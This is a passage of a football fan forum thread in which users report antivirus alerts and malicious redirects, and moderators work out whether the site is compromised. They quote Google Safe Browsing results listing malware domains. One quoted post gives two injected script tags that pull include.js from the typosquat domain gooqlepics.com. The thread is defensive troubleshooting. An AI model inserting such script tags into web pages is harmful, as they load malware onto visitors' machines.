Forum Bugs & Suggestions (1 Viewer)

Should we have a private forum with post restrictions (minimum posts to view)?

  • Yes please

  • No thanks

  • No, but setup a private forum for members

Results are only viewable after voting.
Status
Not open for further replies.
Cirillo

Cirillo

Senior Member
#781
Nov 10, 2009
3,034
#781
this problem is starting to get quite annoying. Basically after pressing "proceed anyway" i then have to perfofn a sprint like excercise to hit "New Posts" before it re-directs to an erectile dysfunction site. funny the first few times but really fucking annoying now. This was happening at work and now at home too
 

Buy on AliExpress.com
.zero

.zero

★ ★ ★
#783
Aug 8, 2006
80,607
#783
My avast antivirus pulled the malware and this time when i proceeded it took me to a site called gameweasel or something like that. Can someone fix this??
 
Orgut

Orgut

Senior Member
#786
Dec 31, 2002
18,199
#786
My antivirus Nod 32 blocks the forum main page!
It says it has a potentialy something which could harm my computer (dont remember if its a malware or something like it)
I need to turn off the antivirus before entering the forum and turn it back on after the page is loaded
Can you fix this annoying problem please?
 
Lapa

Lapa

FLY, EAGLES FLY
#787
Sep 29, 2008
19,954
#787
Orgut said:
My antivirus Nod 32 blocks the forum main page!
It says it has a potentialy something which could harm my computer (dont remember if its a malware or something like it)
I need to turn off the antivirus before entering the forum and turn it back on after the page is loaded
Can you fix this annoying problem please?
Click to expand...
Same shit here. :agree:
 
swag

swag

L'autista
Administrator
#788
Sep 23, 2003
83,457
#788
Has anyone tried my random suggestion of changing their default style on the lower left and seeing if the problem goes away?

I've run remote scans on the site myself and the malware does not seem to be coming from the servers/site itself. I'm still leaning towards the theory that folks have locally infected systems that inject Javascript in their browser to forge redirects to malware sites.
 
swag

swag

L'autista
Administrator
#789
Sep 23, 2003
83,457
#789
Check this...
http://www.UnmaskParasites.com/security-report/?page=forum.juventuz.com

However, this is interesting from Google:
http://www.google.com/safebrowsing/diagnostic?site=forum.juventuz.com
Safe Browsing
Diagnostic page for forum.juventuz.com

What is the current listing status for forum.juventuz.com?

This site is not currently listed as suspicious.

What happened when Google visited this site?

Of the 142 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-07-29, and the last time suspicious content was found on this site was on 2011-07-29.

Malicious software includes 1 trojan(s), 1 exploit(s). Successful infection resulted in an average of 4 new process(es) on the target machine.

Malicious software is hosted on 4 domain(s), including 46.16.240.0/, beehv.ru/, xnert.ru/.

6 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including gooqlejobs.com/, googlejops.com/, gooqlepics.com/.

This site was hosted on 1 network(s) including AS24940 (HETZNER).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, forum.juventuz.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

Next steps:

* Return to the previous page.
* If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
Click to expand...
So, according to Google, it looks like there may be a page on the site where someone may have uploaded something, it may have been compromised, etc., to enable a trojan download. Yet Google does has been known to accidentally flag the entire Internet as malware on occasion, so you can't say with 100% certainty if it's trouble. But it gives me something to poke around with to learn more.

In the meantime, check Google's safe browsing page on google.com itself :lol:
http://www.google.com/safebrowsing/diagnostic?site=google.com
 
swag

swag

L'autista
Administrator
#791
Sep 23, 2003
83,457
#791
Larry said:
These are loaded on index.php:

<script type='text/javascript' src='http://gooqlepics.com/include.js?in=847'></script>
<script type='text/javascript'>$$track.call(window, [70, 114, 73, 101, 65, 109]);</script>

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Better fix it immediately.
Click to expand...
Are you hitting http://forum.juventuz.com/index.php? (Sorry I can't be of more help. I'm a mod, but not a site administrator with privileges to the servers themselves. But I can try to relay to Marty and team.)

Reason being is that attached is the html of the index.php when I hit it myself right now. None of the strings you list above can be found there. Which suggests either a couple of things:

1) Your local system is already infected that allows Javascript injection for the site within your browser
2) The server is selectively allowing some users to see clean pages but oddly not others
2a) Hence my theory above that perhaps a change of the default style on the lower left might be an influencing factor

So when you say "better fix it immediately", we haven't yet clarified whether the fix is on your end or on the server end.
 

Attachments

swag

swag

L'autista
Administrator
#796
Sep 23, 2003
83,457
#796
Ironically, while sifting through the Internet for information on that, I came across sites advising on what was going on that were infected with the very same vulnerabilities they were warning about.

The lesson here really is: don't go around without protection. If I hadn't been running avast! while browsing these sites, I too would have picked up those infections.

Which isn't to say that Juventuz.com doesn't carry the risk of infection. But with 90,000+ sites out there carrying the very same trojan infections that would cause the behaviors you're seeing on these forums, I think we can safely conclude this:

1. If this is a problem for you, your machine is likely infected with a trojan of some kind. How it got there could have been Juventuz, but there are 90k+ other possibilities as well.
2. Find/use measures to prevent your machine from getting infected
3. We'll need to keep monitoring the Tuz as a potential source of infections. Though if you do #2, that should diminish your chances. And even if we can successfully do #3, without #2 in place there's every chance that another web site will infect you and produce the very same problems you're experiencing on the Tuz.... no fault of the Tuz.
 
Zé Tahir

Zé Tahir

JhoolayLaaaal!
Moderator
#797
Dec 10, 2004
29,281
#797
I use the Chrome extension that lets you switch to IE within the browser and I haven't had any virus/malware alerts that way. Also I think someone above mentioned that it seems it's only the main "Forum" page that has issues because once you enter the subforums (or the 'today's posts' page) there aren't any issues. So if you can bypass the main page then you won't even need to switch browsers or use an extension.

^ That is a better option than disabling javascript imo (at least on Chrome) b/c that was just annoying; I kept having to make exceptions on every other page I visited.
 
Sheik Yerbouti

Sheik Yerbouti

★★★
#799
Apr 15, 2006
56,618
#799
Interesting. I ran a virus scan from Avast as well as Windows Defender and removed some infected files. Now when I log into the forum home page, I don't get that notification from Avast. Not sure if the 2 are related.
 
Status
Not open for further replies.

Users Who Are Viewing This Thread (Users: 0, Guests: 1)